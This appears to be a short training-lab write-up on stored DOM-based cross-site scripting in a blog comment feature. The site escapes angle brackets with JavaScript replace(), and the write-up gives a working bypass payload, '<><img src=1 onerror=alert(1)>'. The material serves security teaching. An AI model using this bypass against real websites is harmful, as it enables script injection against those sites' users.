Stored DOM XSS


The website in this lab contains a stored DOM vulnerability in the blog comment functionality. In an attempt to prevent XSS, the website uses the JavaScript replace() function to encode angle brackets.

Reproduction and proof of concept

  1. Use a comment with the vector:

<><img src=1 onerror=alert(1)>